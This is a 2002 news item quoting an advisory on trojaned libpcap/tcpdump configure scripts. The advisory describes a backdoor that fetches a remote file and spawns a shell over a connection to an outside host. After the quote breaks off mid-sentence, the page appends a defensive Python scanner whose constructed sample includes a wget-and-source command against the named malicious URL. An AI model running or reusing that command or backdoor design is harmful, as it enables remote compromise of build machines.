Trojan Found in libpcap and tcpdump
Nov 14, 2002, 14:26
[ Thanks to LogError for this link. ]
"Members of The Houston Linux Users Group discovered that the
newest sources of libpcap and tcpdump available from tcpdump.org
were contaminated with trojan code. HLUG has notified the
maintainers of tcpdump.org.
- "The trojan contains modifications to the configure script and
gencode.c (in libpcap only).
- The configure script downloads
http://mars.raketti.net/~mash/services which is then sourced with
the shell. It contains an embedded shell script that creates a C
file, and compiles it.
- The program connects to 126.96.36.199 (mars.raketti.net) on port
1963 and reads one of three one-byte status codes:
  - A - program exits
  - D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to
  - M - closes connection, sleeps 3600 seconds, and then
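
A heuristic check a reviewer could run over a configure script before building, flagging the pattern the advisory describes: a remote file is downloaded and then sourced by the shell. This is an added example, not code from HLUG or tcpdump.org; the function name is hypothetical, and the `wget` command line in the sample is a constructed assumption, since the page does not show the trojan's actual lines.

```python
import os
import re

# Host named in the advisory quoted on this page.
PAGE_HOSTS = ("mars.raketti.net",)

# Heuristic: a download client invoked with a URL on the same line.
FETCH_RE = re.compile(
    r"\b(?:wget|curl|lynx|fetch)\b.*?((?:https?|ftp)://[^\s\"';|&]+)")
# Output file given with -O/-o (wget/curl style) or a shell redirect.
OUT_RE = re.compile(r"(?:-[Oo]\s*|>\s*)([^\s\"';|&]+)")
# POSIX "." or bash "source" applied to a file, at command position.
SOURCE_RE = re.compile(
    r"(?:^|[;&|]|\bthen\b|\bdo\b)\s*(?:\.|source)\s+([^\s;|&]+)")

# Constructed sample, NOT the real trojaned script.
SAMPLE = """\
#!/bin/sh
# constructed sample for the scanner below
. ./confdefs.sh
wget -q http://mars.raketti.net/~mash/services -O services
. ./services
echo "checking for gcc... yes"
"""


def scan_configure(text):
    """Return (line_number, tag) findings for a configure script."""
    findings = []
    downloaded = set()  # basenames of files fetched earlier in the script
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and comment lines
        if any(host in line for host in PAGE_HOSTS):
            findings.append((n, "advisory-host"))
        m = FETCH_RE.search(line)
        if m:
            findings.append((n, "download"))
            downloaded.add(os.path.basename(m.group(1)))
            downloaded.update(os.path.basename(o) for o in OUT_RE.findall(line))
        for target in SOURCE_RE.findall(line):
            # Sourcing is normal in configure; sourcing a fetched file is not.
            if os.path.basename(target.strip("\"'")) in downloaded:
                findings.append((n, "sources-download"))
    return findings


if __name__ == "__main__":
    for lineno, tag in scan_configure(SAMPLE):
        print(lineno, tag)
```

The patterns are heuristics: a clean result does not show a source tree is untampered, and an ordinary `. ./confdefs.sh` is deliberately not reported.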